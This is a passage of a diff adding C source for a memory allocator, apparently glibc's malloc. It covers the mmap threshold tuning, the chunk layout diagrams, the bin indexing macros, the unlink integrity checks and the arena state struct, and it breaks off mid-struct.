+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if allocated            | |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                       |M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk                                     |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk                            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                         |P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The two exceptions to all this are
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size field.
+
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* check for chunk from non-main arena */
+#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p)         ((p)->size & ~(SIZE_BITS))
+
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))
+
+/* Ptr to previous physical malloc_chunk */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - ((p)->prev_size)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->size = (((p)->size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->prev_size = (s))
+
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (P->size)				      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
+
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   Since the lowest 2 bits in max_fast don't matter in size comparisons,
+   they are used as flags.
+ */
+
+/*
+   FASTCHUNKS_BIT held in max_fast indicates that there are probably
+   some fastbin chunks. It is set true on entering a chunk into any
+   fastbin, and cleared only in malloc_consolidate.
+
+   The truth value is inverted so that have_fastchunks will be true
+   upon startup (since statics are zero-filled), simplifying
+   initialization checks.
+ */
+
+#define FASTCHUNKS_BIT        (1U)
+
+#define have_fastchunks(M)     (((M)->flags & FASTCHUNKS_BIT) == 0)
+#define clear_fastchunks(M)    catomic_or (&(M)->flags, FASTCHUNKS_BIT)
+#define set_fastchunks(M)      catomic_and (&(M)->flags, ~FASTCHUNKS_BIT)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* ARENA_CORRUPTION_BIT is set if a memory corruption was detected on the
+   arena.  Such an arena is no longer used to allocate chunks.  Chunks
+   allocated in that arena before detecting corruption are not freed.  */
+
+#define ARENA_CORRUPTION_BIT (4U)
+
+#define arena_is_corrupt(A)	(((A)->flags & ARENA_CORRUPTION_BIT))
+#define set_arena_corrupt(A)	((A)->flags |= ARENA_CORRUPTION_BIT)
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks.
+   Setting the value clears fastchunk bit but preserves noncontiguous bit.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+#define get_max_fast() global_max_fast
+
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  mutex_t mutex;
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
